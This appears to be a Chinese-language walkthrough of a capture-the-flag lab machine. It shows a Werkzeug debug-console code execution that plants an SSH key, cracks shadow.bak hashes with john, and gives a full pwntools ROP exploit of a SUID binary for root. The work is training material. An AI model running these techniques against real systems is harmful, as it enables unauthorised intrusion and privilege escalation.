基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap -sC -sV 10.10.10.139

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-08 14:22 CST
Nmap scan report for 10.10.10.139
Host is up (0.070s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 49:e8:f1:2a:80:62:de:7e:02:40:a1:f4:30:d2:88:a6 (RSA)
|   256 c8:02:cf:a0:f2:d8:5d:4f:7d:c7:66:0b:4d:5d:0b:df (ECDSA)
|_  256 a5:a9:95:f5:4a:f4:ae:f8:b6:37:92:b8:9a:2a:b4:66 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
| http-title: Ellingson Mineral Corp
|_Requested resource was http://10.10.10.139/index
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.28 seconds

80

页面一些新闻,可以作为参考提示信息:

任意一个页面构造报错,可以发现python debug:

shell

可以通过debug执行python代码,不能直接shell,可以查看文件之类的,读取私钥是加密的,但可以写公钥进去后ssh连接:

1
2
3
4
5
os.listdir('/home')
os.listdir('/home/hal/')
os.listdir('/home/hal/.ssh')
with open('/home/hal/.ssh/id_rsa','r') as f: f.read()
with open('/home/hal/.ssh/authorized_keys','a') as f: f.write('\nssh-rsa xxxxxx')

信息

hal用户在adm组中,可以查看日志之类的(官方的和ippsec的都是adm可以查看backup,可能机器设置问题,0xdf博客说重置后会变成易受攻击状态,因为定时任务设置的是每天一次backup):

根据提示生成小字典,破解出来margo用户密码,直接rockyou硬跑也行:

1
2
3
4
5
grep -i -e love -e secret -e sex -e god /usr/share/wordlists/rockyou.txt > grepped_rockyou 

sudo john --wordlist=grepped_rockyou hash.txt

$6$Lv8rcvK8$la/ms1mYal7QDxbXUYiD7LAADl.yE4H7mUGF6eTlYaZ2DVPi9z1bDIzqGZFwWrPkRrB9G/kbd72poeAnyJL4c1:iamgod$08

shadow.bak

1
2
3
4
5
...
theplague:$6$.5ef7Dajxto8Lz3u$Si5BDZZ81UxRCWEJbbQH9mBCdnuptj/aG6mqeu9UfeeSY7Ot9gp2wbQLTAJaahnlTrxN613L6Vner4tO1W.ot/:17964:0:99999:7:::
hal:$6$UYTy.cHj$qGyl.fQ1PlXPllI4rbx6KM.lW6b3CJ.k32JxviVqCC2AJPpmybhsA8zPRf0/i92BTpOKtrWcqsFAcdSxEkee30:17964:0:99999:7:::
margo:$6$Lv8rcvK8$la/ms1mYal7QDxbXUYiD7LAADl.yE4H7mUGF6eTlYaZ2DVPi9z1bDIzqGZFwWrPkRrB9G/kbd72poeAnyJL4c1:17964:0:99999:7:::
duke:$6$bFjry0BT$OtPFpMfL/KuUZOafZalqHINNX/acVeIDiXXCPo9dPi1YHOp9AAAAnFTfEh.2AheGIvXMGMnEFl5DlTAbIzwYc/:17964:0:99999:7:::

user flag

margo用户登录,得到user.txt:

提权信息

suid发现一个garbage:

garbage & root flag

有ASLR,NX的rop,puts泄漏函数地址,计算base,之后rop,直接打会放弃suid,还需要加入setuid,参考资料里0xdf的很详细

1
2
3
4
rip offset 136

rop-tool gadget garbage | grep rdi
0x000000000040179b -> pop rdi; ret ;

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python

from pwn import *

#context.log_level = "DEBUG"
sshConn = ssh(host='10.10.10.139', user='margo', password='iamgod$08')
garbage = sshConn.process('garbage')

junk     = "A" * 136      # offset from pattern
pop_rdi  = p64(0x40179b)  # rop-tool gadget garbage | grep rdi
puts_plt = p64(0x401050)  # objdump -D garbage | grep puts@GLIBC
puts_got = p64(0x404028)  # objdump -D garbage | grep puts@GLIBC
main     = p64(0x401619)  # objdump -D garbage | grep '<main>' 

stage_1 = junk + pop_rdi + puts_got + puts_plt + main
garbage.sendline(stage_1)
garbage.recvuntil("access denied.\n")
leaked_puts = u64(garbage.recvline()[:-1].ljust(8, '\x00'))
log.success("Leaked puts address: 0x%x" % leaked_puts)
garbage.recvuntil("Enter access password: ")


# offsets
libc_puts    = 0x809c0  # readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep " puts@@GLIBC"
libc_exec_sh = 0x4f322  # one_gadget gadget garbage
libc_setuid  = 0xe5970  # readelf -s libs/libc6_2.27-3ubuntu1_amd64/libc.so.6 | grep " setuid@@GLIBC"
libc_base   = leaked_puts - libc_puts

stage_2 = junk + pop_rdi + p64(0) + p64(libc_setuid + libc_base) + p64(libc_exec_sh + libc_base)
garbage.sendline(stage_2)
garbage.recvuntil("access denied.")
garbage.interactive()

参考资料